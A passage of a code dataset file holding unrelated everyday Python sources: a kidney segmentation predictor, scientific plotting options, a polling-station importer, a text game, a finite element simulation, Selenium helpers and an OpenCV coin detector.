torch.cuda.is_available() else 'cpu'\n\n# DATA_PATH = '/home/zhaohoj/development_sshfs/dataset/kaggle-hubmap-kidney-segmentation/'\n# DATA_PATH = '/data/home/zhaohj/dev/dataset/kaggle-hubmap-kidney-segmentation/'\nDATA_PATH = 'F:/Data/kaggle/kaggle-hubmap-kidney-segmentation/'\npth_path = 'D:\\workspace\\kaggle-project\\HuBMAP/pth/'\n# pth_path = '/data/home/zhaohj/dev/dataset/pth/pth'\n# pth_path = '/data/home/zhaohj/workspace/kaggle-project/HuBMAP/pth/'\nWINDOW = 1024\nMIN_OVERLAP = 40\n\nmodel_filepaths = [os.path.join(pth_path, filename) for filename in os.listdir(pth_path)]\n\np = pathlib.Path(DATA_PATH)\nNEW_SIZE = 256\nfold_models = []\nmodel = get_unet_model()\nmodel.to(DEVICE)\n# model = torch.nn.DataParallel(model)\n\nfor fold_model_path in model_filepaths:\n model.load_state_dict(torch.load(fold_model_path))\n fold_models.append(model)\n\ntest_fns = glob.glob(os.path.join(DATA_PATH, 'test/*.tiff'))\nsubm = {}\nTHRESHOLD = 0.5\ntrfm = T.Compose([\n T.ToPILImage(),\n T.Resize(NEW_SIZE),\n T.ToTensor(),\n T.Normalize([0.625, 0.448, 0.688],\n [0.131, 0.177, 0.101]),\n])\nfor i, filename in tqdm(enumerate(test_fns), total=len(test_fns)):\n print(f\"{i + 1} Predicting {os.path.basename(filename).split('.')[0]}\")\n dataset = rasterio.open(filename, transform=identity)\n slices = make_grid(dataset.shape, window=WINDOW, min_overlap=MIN_OVERLAP)\n preds = np.zeros(dataset.shape, dtype=np.uint8)\n\n for (x1, x2, y1, y2) in slices:\n image = dataset.read([1, 2, 3],\n window=Window.from_slices((x1, x2), (y1, y2)))\n image = np.moveaxis(image, 0, -1)\n image = cv2.resize(image, (NEW_SIZE, NEW_SIZE))\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n image = trfm(image)\n image = image.unsqueeze(0)\n pred = None\n for fold_model_path in model_filepaths:\n model.load_state_dict(torch.load(fold_model_path))\n model.eval()\n image = image.to(DEVICE)\n with torch.no_grad():\n score = model(image).squeeze()\n if pred is None:\n pred = score\n else:\n pred += score\n pred = pred / len(fold_models)\n pred = pred.sigmoid().cpu().numpy()\n pred = cv2.resize(pred, (WINDOW, WINDOW))\n preds[x1:x2, y1:y2] = (pred > THRESHOLD).astype(np.uint8)\n subm[i] = {'id': os.path.basename(filename).split('.')[0], 'predicted': rle_numba_encode(preds)}\n del preds\n gc.collect()\n\nsubmission = pd.DataFrame.from_dict(subm, orient='index')\nsubmission.to_csv('submission.csv', index=False)","sub_path":"HuBMAP/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"194214067","text":"# ===============================================================================\n# Copyright 2015 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============================================================================\n\n# ============= enthought library imports =======================\nfrom traits.api import Str, Bool, Float, Property, List, Color, Enum\n# ============= standard library imports ========================\n# ============= local library imports ==========================\nfrom pychron.options.views.isochron_views import INVERSE_ISOCHRON_VIEWS, ISOCHRON_VIEWS\nfrom pychron.options.options import AgeOptions\nfrom pychron.pychron_constants import FIT_ERROR_TYPES\n\n\nclass IsochronOptions(AgeOptions):\n subview_names = List(['Main', 'Appearance'])\n\n def get_subview(self, name):\n name = name.lower()\n klass = self._get_subview(name)\n obj = klass(model=self)\n return obj\n\n def _get_subview(self, name):\n return ISOCHRON_VIEWS[name]\n\n def _aux_plots_default(self):\n return [self.aux_plot_klass(plot_enabled=True, name='inverse_isochron')]\n\n\nclass InverseIsochronOptions(IsochronOptions):\n error_calc_method = Enum(*FIT_ERROR_TYPES)\n fill_ellipses = Bool(False)\n show_nominal_intercept = Bool(False)\n nominal_intercept_label = Str('Atm', enter_set=True, auto_set=False)\n nominal_intercept_value = Property(Float, depends_on='_nominal_intercept_value')\n _nominal_intercept_value = Float(295.5, enter_set=True, auto_set=False)\n\n invert_nominal_intercept = Bool(True)\n inset_marker_size = Float(1.0)\n inset_marker_color = Color('black')\n regressor_kind = Enum('Reed', 'NewYork')\n \n def _set_nominal_intercept_value(self, v):\n self._nominal_intercept_value = v\n\n def _get_nominal_intercept_value(self):\n v = self._nominal_intercept_value\n if self.invert_nominal_intercept:\n v **= -1\n return v\n\n def _get_subview(self, name):\n return INVERSE_ISOCHRON_VIEWS[name]\n\n# ============= EOF =============================================\n","sub_path":"pychron/options/isochron.py","file_name":"isochron.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"115865907","text":"from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter\n\n\nclass Command(BaseXpressDemocracyClubCsvImporter):\n council_id = \"BOL\"\n addresses_name = \"2021-05-01T18:52:07.783562/Democracy_Club__06May2021.CSV\"\n stations_name = \"2021-05-01T18:52:07.783562/Democracy_Club__06May2021.CSV\"\n elections = [\"2021-05-06\"]\n csv_delimiter = \",\"\n\n def station_record_to_dict(self, record):\n if record.polling_place_id == \"4291\":\n # Trinity Methodist Hall (postcode geocode puts this quite away from actual location, making error spotting\n # more difficult)\n record = record._replace(\n polling_place_easting=374156, polling_place_northing=405696\n )\n\n return super().station_record_to_dict(record)\n\n def address_record_to_dict(self, record):\n uprn = record.property_urn.strip().lstrip(\"0\")\n\n if uprn in [\n \"100012434533\", # RATCLIFFES FARM HOUSE, WINGATES LANE, WESTHOUGHTON, BOLTON\n \"10070916825\", # CURLEYS FISHERY, TOP O TH WALLSUCHES, HORWICH, BOLTON\n \"100012431797\", # 321 DERBY STREET, BOLTON\n \"10001244960\", # FLAT 3, 115-117 DERBY STREET, BOLTON\n \"100012556511\", # 152 LONGSIGHT, BOLTON\n ]:\n return None\n\n # FLAT 1 290 ST HELENS ROAD, BOLTON\n if uprn == \"10001244221\":\n record = record._replace(property_urn=\"\", post_code=\"BL1 4JU\")\n\n if record.addressline6 in [\n \"BL2 4JU\",\n \"BL2 3EL\",\n \"BL2 3BQ\",\n \"BL2 6DZ\",\n \"BL1 3QW\",\n \"BL2 2JU\",\n \"BL4 8JA\",\n \"BL1 5DB\",\n \"BL1 3AU\",\n \"BL1 5HP\",\n \"BL1 3SJ\",\n \"BL1 2HZ\",\n \"BL3 2DP\",\n \"BL4 0LW\",\n \"BL4 7PQ\",\n \"BL5 2DL\",\n \"BL4 7BB\",\n \"BL3 1BA\",\n \"BL6 4ED\",\n \"BL6 6PX\",\n \"BL6 6HN\",\n \"BL3 6ST\",\n \"BL4 0HU\",\n \"BL5 3LT\",\n \"BL5 2JX\",\n \"BL5 2DJ\",\n ]:\n return None\n\n rec = super().address_record_to_dict(record)\n\n if record.addressline6.strip() == \"BL7 OHR\":\n rec[\"postcode\"] = \"BL7 0HR\"\n\n if record.addressline6.strip() == \"BL4 ONX\":\n rec[\"postcode\"] = \"BL4 0NX\"\n\n if record.addressline6.strip() == \"BL4 ONY\":\n rec[\"postcode\"] = \"BL4 0NY\"\n\n return rec\n","sub_path":"polling_stations/apps/data_importers/management/commands/import_bolton.py","file_name":"import_bolton.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426607288","text":"import random\nimport arcade\nclass jugadores:\n def __init__(self, millas, sed, cansancio, botella):\n self.millas = millas\n self.sed = sed\n self.cansancio = cansancio\n self.botella = botella\n\njugador = jugadores(0, 0, 0, 3)\ncobalto = jugadores(-50, 0, 0, 6)\n\n#def enemigos():\n# if cobalto.botella <= 0:\n# cobalto.botella = 0\n \n# else: \n# cobalto.millas += random.randint(7, 14)\n# cobalto.botella -= 1\n\n\ndef main ():\n done = False\n print(\"Bienvenido a Escorpión\")\n print(\"Has robado la montura más preciada del emperador, el escorpión ojos claros\")\n print(\"Te persigue la guardia de cobalto personal a través del desierto\")\n print(\"Sobrevive, escapa y continua tu vida como ladrón\")\n\n while not done:\n print(\"A. Beber de tu botella\")\n print(\"E. Hacia delante a velocidad moderada\")\n print(\"I. Adelante full velocidad\")\n print(\"O. Descansar por la noche\")\n print(\"U. Pasar\")\n print(\"Q. Salir\")\n\n opcion = input(\"Elija: \")\n\n if opcion == \"q\":\n done = True\n\n elif opcion == \"a\":\n if jugador.botella <= 0:\n print(\"Intentas beber pero te desesperas en el intento, pierdes un día\")\n cobalto.millas += random.randint(7, 14)\n else:\n print(\"Te sientes revitalizado\")\n jugador.botella -= 1\n jugador.sed = 0\n cobalto.millas += random.randint(7, 14)\n\n elif opcion == \"e\":\n desplazamiento = random.randint(5, 12)\n jugador.millas += desplazamiento\n print(\"Te mueves \", desplazamiento, \" millas, llevas en total unas \", jugador.millas, \" millas recorridas\")\n cobalto.millas += random.randint(7, 14)\n jugador.sed += 1\n jugador.cansancio += 1\n\n elif opcion == \"i\":\n desplazamiento = random.randint(10, 20)\n jugador.millas += desplazamiento\n print(\"Te mueves \", desplazamiento, \" millas, llevas en total unas \", jugador.millas,\n \" millas recorridas\")\n cobalto.millas += random.randint(7, 14)\n jugador.sed += random.randint(1, 2)\n jugador.cansancio += random.randint(1, 3)\n\n elif opcion == \"o\":\n jugador.cansancio = 0\n print(\"Descansais alegremente, os sentiís mucho mejor\")\n cobalto.millas += random.randint(7, 14)\n\n if jugador.sed >= 3 and jugador.sed < 5:\n print(\"Tenéis bastante sed\")\n\n elif jugador.sed >= 5:\n print(\"No podés aguantar más, moriís en medio del desierto\")\n done = True\n break\n\n if jugador.cansancio >= 5 and jugador.cansancio < 8:\n print(\"Tu grupo empieza a estar cansado\")\n\n elif jugador.cansancio >=8:\n print(\"No podeis más, con peso en vuestros cuerpos os desmallais, moriís por falta de sueño\")\n done = True\n break\n\n if cobalto.millas >= jugador.millas:\n print(\"Os han pillado, no podeis hacer nada, os ejecutan a golpe de lanza\")\n done = True\n break\n\n elif jugador.millas - cobalto.millas <= 15:\n print(\"Unas siluetas armadas aparecen en el horizonte\")\n\n if jugador.millas >= 200:\n print(\"Lo conseguisteis, habéis ganado\")\n done = True\n\nmain()\n","sub_path":"lab04-camel/Text-camel-game.py","file_name":"Text-camel-game.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"437406193","text":"import numpy as np\n# 初始化三角形初始位置\n\nnode_num = 4\n\nnode_pos = np.array([[0,0],[1,0],[0,1],[1,1]],dtype = float)\n\nnode_dx = np.zeros((node_num,2))\n\nelement_num = 2\n\nelement = np.array([[0,1,2],[2,1,3]])\n\nelement_minv = np.zeros((element_num,2,2))\n\nelement_area = np.zeros((element_num))\n\nfor i in range(element_num):\n p0 = node_pos[element[i,0],:]\n p1 = node_pos[element[i,1],:]\n p2 = node_pos[element[i,2],:]\n \n Ds = np.array([[p1[0] - p0[0],p2[0] - p0[0]],[p1[1] - p0[1],p2[1] - p0[1]]])\n \n element_minv[i,:,:] = np.linalg.inv(Ds)\n\nnode_pos[1,0] = 0.2\n\n# https://www.continuummechanics.org/tensornotationbasic.html\ndef doubleDotProduct(A,B):\n return A[0,0]*B[0,0] + A[1,0]*B[1,0] + A[0,1]*B[0,1] + A[1,1]*B[1,1]\n\ntime = 0\ntimeFinal = 3000\nwhile(time < timeFinal):\n time += 1\n for i in range(element_num):\n p0 = node_pos[element[i,0],:]\n p1 = node_pos[element[i,1],:]\n p2 = node_pos[element[i,2],:]\n \n Ds = np.array([[p1[0] - p0[0],p2[0] - p0[0]],[p1[1] - p0[1],p2[1] - p0[1]]])\n # 形变梯度\n F = np.dot(Ds,element_minv[i,:,:])\n # lame常数\n mu = 1\n # lame常数\n la = 1\n \n pJpF = np.array([[F[1,1],-F[1,0]],[-F[0,1],F[0,0]]])\n J = max(0.01,np.linalg.det(F))\n logJ = np.log(J)\n I_c = F[0,0]**2 + F[1,1]**2\n energy = 0.5 * mu * (I_c - 2) - mu * logJ + 0.5 * la * logJ**2\n piola = mu * (F - 1.0 / J * pJpF) + la * logJ / J * pJpF\n # Jminus = np.linalg.det(F) - 1.0 - mu / la\n # piola = mu * F + la * Jminus * pJpF\n # 三角形面积\n area = 0.5\n # 计算力\n mm = np.linalg.inv(element_minv[i,:,:])\n H = area * np.dot(piola,mm.transpose())\n \n gradC0 = np.array([H[0,0],H[1,0]])\n gradC1 = np.array([H[0,1],H[1,1]])\n gradC2 = np.array([-H[0,0]-H[0,1],-H[1,0]-H[1,1]])\n \n node_force = np.zeros((3,2))\n #第一个顶点\n node_force[0,:] = gradC0\n #第二个顶点\n node_force[1,:] = gradC1\n #第三个顶点\n node_force[2,:] = gradC2\n \n invMass = 1\n \n dt = 0.1\n sumGradC = invMass * (gradC0[0]**2 + gradC0[1]**2)\n sumGradC += invMass * (gradC1[0]**2 + gradC1[1]**2)\n sumGradC += invMass * (gradC2[0]**2 + gradC2[1]**2)\n \n if sumGradC < 1e-10:\n break\n \n node_dx[0,:] += dt * gradC0\n node_dx[1,:] += dt * gradC1\n node_dx[2,:] += dt * gradC2\n \n # node_dx[element[i,0],:] += energy / sumGradC * invMass * gradC0\n # node_dx[element[i,1],:] += energy / sumGradC * invMass * gradC1\n # node_dx[element[i,2],:] += energy / sumGradC * invMass * gradC2\n \n element_area[i] = np.cross(node_pos[1,:] - node_pos[0,:],node_pos[2,:] - node_pos[0,:])*0.5\n \n node_pos += dt * node_dx\n node_dx[:,:] = 0\n \n","sub_path":"FiniteElement/femcourse/neohookean.py","file_name":"neohookean.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384386943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 20 18:44:13 2019\n\n@author: estruc-datos\n\"\"\"\n\nimport stack \n\n'''Realizar un programa que muestre la cantidad de elementos de una pila de enteros.\nMostrar y desapilar 2 elementos y volver a imprimir el tamaño de la pila.'''\n\npila = stack.Stack(4)\npila.push(2)\npila.push(4)\npila.push(6)\npila.push(8)\n\npila.imprimir()\nprint(\"La pila tiene\", pila.getSize(), \"elementos\")\nprint(\"Desapilamos los elementos\", pila.pop(), \"y\", pila.pop())\nprint(\"El nuevo tamaño es\", pila.getSize())\npila.imprimir()","sub_path":"trabajo-practico-4-5-pilas-colas/pila-ejercicio-2.py","file_name":"pila-ejercicio-2.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"140244229","text":"import os\nimport h5py\nimport numpy as np\nimport cv2\n\ndir_list = [r'D:/dataset/hand/0', r'D:/dataset/hand/1', r'D:/dataset/hand/2',\n r'D:/dataset/hand/3', r'D:/dataset/hand/4', r'D:/dataset/hand/5']\n\n\ndef image_2_h5():\n\n Y = []\n X = []\n\n for dir in dir_list:\n dirs = os.listdir(dir)\n print(len(dirs))\n\n num = 0\n print('begin to process data in ' + dir)\n for file in dirs:\n label = eval(dir[-1])\n\n Y.append(label)\n\n im = cv2.imread(dir+'/'+file)\n im = cv2.resize(im, (64, 64), interpolation=cv2.INTER_AREA)\n mat = np.asarray(im)\n X.append(mat)\n\n num += 1\n if num % 500 == 0:\n print('have process ' + str(num) + ' data point')\n print(label)\n\n file = h5py.File(r'D:/dataset/hand/data.h5', 'w')\n file.create_dataset('X', data=np.array(X))\n file.create_dataset('Y', data=np.array(Y))\n file.close()\n\n # test\n data = h5py.File(r'D:/dataset/hand/data.h5', 'r')\n X_data = data['X']\n print(X_data.shape)\n Y_data = data['Y']\n print(Y_data[2])\n cv2.imshow('test', X_data[2])\n if cv2.waitKey(0) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n image_2_h5()\n","sub_path":"Test_Wheel/data to h5(仅储存相同尺寸图片及标签).py","file_name":"data to h5(仅储存相同尺寸图片及标签).py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302378278","text":"from django.db import models\nfrom catalogues import models as catalog_models\n\n\nclass AssignedCars(models.Model):\n idCar = models.ForeignKey(\n catalog_models.Cars,\n on_delete=models.DO_NOTHING\n )\n idUser = models.ForeignKey(\n catalog_models.Users,\n on_delete=models.DO_NOTHING\n )\n\n class Meta:\n unique_together = ('idCar', 'idUser')\n db_table = 'AssignedCar'\n\n\nclass UsedCar(models.Model):\n expiration = models.DateTimeField()\n idAssignedCar = models.OneToOneField(\n AssignedCars,\n on_delete=models.DO_NOTHING,\n primary_key=True\n )\n\n class Meta:\n db_table = 'UsedCar'\n","sub_path":"control/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"621353197","text":"from robot.libraries.BuiltIn import BuiltIn\n\nfrom src.main.pages.BasePage import BasePage\nfrom src.main.utils.Utils import Utils\n\n\ndef _seleniumlib():\n return BuiltIn().get_library_instance(\"Selenium2Library\")\n\n\nlocators = {\"interests_block\": \"xpath=//div[@id='interestsId']\",\n \"how_did_you_hear_dropdown\": \"xpath=//select[@id='ProfileQuestion1']\",\n \"what_is_your_age_dropdown\": \"xpath=//select[@id='ProfileQuestion2']\",\n \"generally_do_you_travel_dropdown\": \"xpath=//select[@id='ProfileQuestion3']\",\n }\n\n\nclass AboutYourself(object):\n def __init__(self, interests_block_locator=locators[\"interests_block\"],\n how_did_you_hear_locator=locators[\"how_did_you_hear_dropdown\"],\n what_is_you_age_locator=locators[\"what_is_your_age_dropdown\"],\n generally_do_you_travel_locator=locators[\"generally_do_you_travel_dropdown\"], ):\n self.interests_block_locator = interests_block_locator\n self.how_did_you_hear_locator = how_did_you_hear_locator\n self.what_is_you_age_locator = what_is_you_age_locator\n self.generally_do_you_travel_locator = generally_do_you_travel_locator\n\n def select_all_interests(self):\n self.ten_elements_should_be_present_in_interests_block()\n BasePage().select_all_checkboxes_in_block(self.interests_block_locator)\n\n def select_how_did_you_hear_about_us(self, text='Google and other Search'):\n return BasePage().select_value_in_dropdown_by_text(self.how_did_you_hear_locator, text)\n\n def select_what_is_you_age_group(self, text='80+'):\n return BasePage().select_value_in_dropdown_by_text(self.what_is_you_age_locator, text)\n\n def select_generally_do_you_travel(self, text='Travel Solo'):\n return BasePage().select_value_in_dropdown_by_text(self.generally_do_you_travel_locator, text)\n\n def select_interests_and_questions(self):\n self.select_all_interests()\n self.select_how_did_you_hear_about_us()\n self.select_what_is_you_age_group()\n self.select_generally_do_you_travel()\n\n def ten_elements_should_be_present_in_interests_block(self):\n labels = BasePage().get_all_text_from_webelements_list(self.interests_block_locator + \"//label\")\n Utils().print_list(labels)\n expected_labels = ['Bird Watching', 'Cultural Travel', 'Gourmet Dining', 'Kayaking', 'Photography',\n 'Rain Forest Exploration', 'Scuba/Snorkeling/Swimming', 'Walking/Hiking',\n 'Whale Watching', 'Wildlife Observation',\n ]\n Utils().print_list(expected_labels)\n BuiltIn().should_be_true(Utils().compare_lists(labels, expected_labels))\n","sub_path":"src/main/forms/AboutYourself.py","file_name":"AboutYourself.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"581379690","text":"'''COIN STACK DETECTER USING OPENCV\r\n\tAuthor : Sai Kishore Swaminathan\r\n\tDate : 23/10/2019'''\r\nimport cv2\r\nimport numpy as np \r\nimport os\r\nfrom kde import kde \r\nimport matplotlib.pyplot as plt \r\nimport glob \r\n\r\n\r\nclass Solution:\r\n\tdef __init__(self,path):\r\n\t\tself.myPath = path\r\n\r\n\tdef resize_img(self,oriimg):\r\n\t\tW = 1000.\r\n\t\theight, width, depth = oriimg.shape\r\n\t\timgScale = W/(width*3)\r\n\t\tnewX,newY = oriimg.shape[1]*imgScale, oriimg.shape[0]*imgScale\r\n\t\treturn cv2.resize(oriimg,(int(newX),int(newY)))\r\n\r\n\tdef make_clustered_array(self,center_points, x_axis_clusters ):\r\n\t\tline_clusters = []\r\n\t\trelevant_clusters = np.array([i for i in x_axis_clusters if len(i)>1])\r\n\t\tif len(relevant_clusters) !=0 :\r\n\t\t\tfor i in relevant_clusters:\r\n\t\t\t\tselected = [j for j in center_points if j[0] in i]\r\n\t\t\t\tline_clusters.append(selected)\r\n\t\treturn line_clusters\r\n\r\n\tdef find_Lines(self):\r\n\t\tNo_of_images = len(glob.glob1(self.myPath,\"*.jpg\"))\r\n\t\tnumbers = np.arange(1,No_of_images+1)\r\n\r\n\t\tfor number in numbers:\r\n\t\t\toriimg = cv2.imread(self.myPath+\"\\Coins_img ({}).jpg\".format(number))\r\n\t\t\tnewimg = self.resize_img(oriimg)\r\n\t\t\t# print (newimg.shape)\r\n\t\t\tgray = cv2.cvtColor(newimg,cv2.COLOR_BGR2GRAY)\r\n\t\t\t# gray = cv2.medianBlur(gray,(5,5))\r\n\t\t\tgray = cv2.bilateralFilter(gray,13,60,60)\r\n\t\t\toutput = cv2.cvtColor(gray,cv2.COLOR_GRAY2BGR)\r\n\r\n\t\t\tCircles = cv2.HoughCircles(gray,cv2.HOUGH_GRADIENT,\r\n\t\t\t\t\t\t\t\t\t\t1,40,param1= 90,param2= 30,\r\n\t\t\t\t\t\t\t\t\t\tminRadius=0,maxRadius=0)\r\n\r\n\t\t\tif Circles is None:\r\n\t\t\t\tcv2.imshow(\"Vertical Lines\", output)\r\n\t\t\t\tcv2.waitKey(0)\r\n\t\t\t\tcv2.destroyAllWindows()\r\n\t\t\tif Circles is not None:\r\n\t\t\t\tDetected = np.uint16(np.around(Circles))\r\n\t\t\t\tcenters = []\r\n\t\t\t\tfor x,y,r in Detected[0,:]:\r\n\t\t\t\t\tcv2.circle(output,(x,y),r,(0,255,255),3)\r\n\t\t\t\t\tcv2.circle(output,(x,y),2,(255,0,0),2)\r\n\t\t\t\t\tcenters.append((x,y))\r\n\t\t\t\t\r\n\t\t\t\tX_axis_points = [i[0] for i in centers]\r\n\t\t\t\tclusters = kde(X_axis_points,bdw=3.5) \r\n\t\t\t\t#If the model isn't being accurate try tweaking the bdw \r\n\t\t\t\t\r\n\t\t\t\tline_clusters = self.make_clustered_array(centers,clusters)\r\n\r\n\t\t\t\tfor i in line_clusters:\r\n\t\t\t\t\ti = np.array(i)\r\n\t\t\t\t\tX_1 = np.argmin(i[:,1])\r\n\t\t\t\t\tX_2 = np.argmax(i[:,1])\r\n\t\t\t\t\tcv2.line(output,tuple(i[X_1]),tuple(i[X_2]),(0,0,0),3)\r\n\r\n\t\t\t\tcv2.imshow(\"Vertical Lines\", output)\r\n\t\t\t\tplt.show()\r\n\t\t\t\tcv2.waitKey(0)\r\n\t\t\t\tcv2.destroyAllWindows()\r\n\t\treturn None \r\n\r\n\r\nif __name__ == '__main__':\r\n\t'''PLEASE ONLY USE PATHS TO IMAGE REPOSITORIES'''\r\n\r\n\t# myPath = os.getcwd()+\"\\COIN_IMAGES_NORMAL\"\r\n\tmyPath = os.getcwd()+\"\\COIN_IMAGES_RARE\"\r\n\tObj1 = Solution(myPath)\r\n\tObj1.find_Lines()\r\n\r\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"60570350","text":"'''\n\n**************\n* *\n* *\n* *\n**************\n\n'''\n\nimport pprint\n\ndef boxPrint(symbol, width, height):\n if len(symbol) != 1:\n raise Exception('\"symbol\" needs to be a string of length 1')\n if (width < 2) or (height < 2):\n raise Exception('\"width\" or \"height\" need to be greater than 1')\n print(symbol * width)\n \n\n for i in range(height - 2):\n print(symbol + (' ' * (width - 2)) + symbol)\n\n print(symbol * width)\n\nboxPrint('#', 10, 10)\n\n'''\n\ndef makeGrid(width, height):\n board = []\n \n for row in range(width):\n board.append([])\n for column in range(height):\n\n board[row].append(' ')\n pprint.pprint(board)\n\n\nmakeGrid(10,10)\n'''\n","sub_path":"boxprint.py","file_name":"boxprint.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"11645492","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\nimport random\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\nfrom webdriver_manager.opera import OperaDriverManager\n\n\nclass Base:\n ''' Base selenium\n\n Example:\n from selenium_library import Base\n\n session = Base(headless=False)\n session.open('https://www.google.de')\n input = session.element('[name=\"q\"]')\n session.click(input)\n session.send_keys(input, 'pipi')\n '''\n def __init__(\n self,\n options=None,\n browser='chrome',\n headless=True,\n window_width=1920,\n window_height=1080\n ):\n '''\n Init session vars\n\n Args:\n browser (str): Browser name\n headlesss (boolean): Hide browser\n window_width (int): Window width\n window_height (int): Window height\n '''\n self.browser = browser\n self.headless = headless\n self.options = options\n self.window_width = window_width\n self.window_height = window_height\n self.launch_browser()\n\n def launch_browser(self):\n '''Launch browser and create a session'''\n if self.browser == 'firefox':\n options = FirefoxOptions()\n else:\n options = ChromeOptions()\n\n if self.headless:\n options.add_argument('--headless')\n\n if self.options:\n for option in self.options:\n options.add_argument(option)\n\n window_size = '--window-size={},{}'.format(\n self.window_width,\n self.window_height\n )\n options.add_argument(window_size)\n\n if self.browser == 'firefox':\n self.session = webdriver.Firefox(\n executable_path=GeckoDriverManager().install(),\n firefox_options=options\n )\n elif self.browser == 'opera':\n self.session = webdriver.Opera(\n executable_path=OperaDriverManager().install(),\n options=options\n )\n else:\n self.session = webdriver.Chrome(\n ChromeDriverManager().install(),\n chrome_options=options\n )\n\n def open(self, url):\n '''Open a new url in the session'''\n self.session.get(url)\n\n def get_url(self):\n '''Get the current url from the session\n\n Returns:\n str: Current url\n '''\n return self.session.current_url\n\n def element(self, selector):\n ''' Try to find an element in dom\n\n Returns:\n [None, WebElement]: Element or None if no element was found\n '''\n try:\n return self.session.find_element_by_css_selector(selector)\n except Exception:\n pass\n\n def elements(self, selector):\n ''' Try to find every element in dom\n If there is no element it returns None\n\n Args:\n selector (str): DOM selector\n\n Returns:\n [None, list]: List of elements or None\n '''\n elements_list = self.session.find_elements_by_css_selector(selector)\n return (elements_list if len(elements_list) > 0 else None)\n\n def click(self, selector_or_element):\n '''Try to click on an element\n\n Args:\n selector_or_element [str, WebElement]\n '''\n el = None\n if type(selector_or_element) == 'str':\n el = self.element(selector_or_element)\n\n if isinstance(el, WebElement):\n el.click()\n\n def get_text(self, selector_or_element):\n '''Try to get text\n\n Args:\n selector_or_element [str, WebElement]\n\n Returns:\n str: Text from an element\n '''\n el = None\n if type(selector_or_element) == 'str':\n el = self.element(selector_or_element)\n\n if isinstance(el, WebElement):\n return el.text\n\n\n def send_keys(self, selector_or_element, keys):\n ''' Send keys to an element\n\n Args:\n selector_or_element [str, WebElement]\n keys (str): Keys to send\n '''\n el = None\n if type(selector_or_element) == 'str':\n el = self.element(selector_or_element)\n\n if isinstance(el, WebElement):\n el.send_keys(keys)\n\n def clear_keys(self, selector_or_element):\n '''Clear keys from element\n\n Args:\n selector_or_element [str, WebElement]\n '''\n if type(selector_or_element) == 'str':\n el = self.element(selector_or_element)\n\n if isinstance(el, WebElement):\n el.clear()\n\n def wait(self, seconds=1, is_random=False, min=1, max=10):\n '''Wait a specific time or random\n\n Args:\n seconds (int): Time to wait in seconds\n is_random (boolean): Generate seconds to wait via randint\n min (int): Minium time to wait if is_random is true\n max (int): Max time to wait if is_random is true\n '''\n time.sleep(random.randint(min, max) if is_random else seconds)\n\n def close(self):\n ''' Close the current session '''\n self.session.close()\n\n def __enter__(self):\n '''Will be executed when this class will be created via ContextMenu'''\n return self\n\n def __exit__(self, *args):\n ''' Will be executed when this class will be closed via ContextMenu '''\n self.close()\n","sub_path":"selenium_library/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"147601909","text":"import json\nfrom enum import Enum, unique\n\n\nclass Layout(object):\n pass\n\n\nclass GridFitLayout(Layout):\n type: str = \"grid_fit\"\n\n def __init__(self, row_count, column_count):\n self.row_count = row_count\n self.column_count = column_count\n\n def json(self) -> dict:\n return {\n \"type\": self.type,\n \"row_count\": self.row_count,\n \"column_count\": self.column_count\n }\n\n\n@unique\nclass ScrollDirection(str, Enum):\n vertical = \"vertical\"\n horizontal = \"horizontal\"\n\n\nclass GridScrollLayout(Layout):\n type: str = \"grid_scroll\"\n\n def __init__(self, direction: ScrollDirection, row_count: float, column_count: float):\n self.direction = direction\n self.row_count = row_count\n self.column_count = column_count\n\n def json(self) -> dict:\n return {\n \"type\": self.type,\n \"direction\": self.direction,\n \"row_count\": self.row_count,\n \"column_count\": self.column_count\n 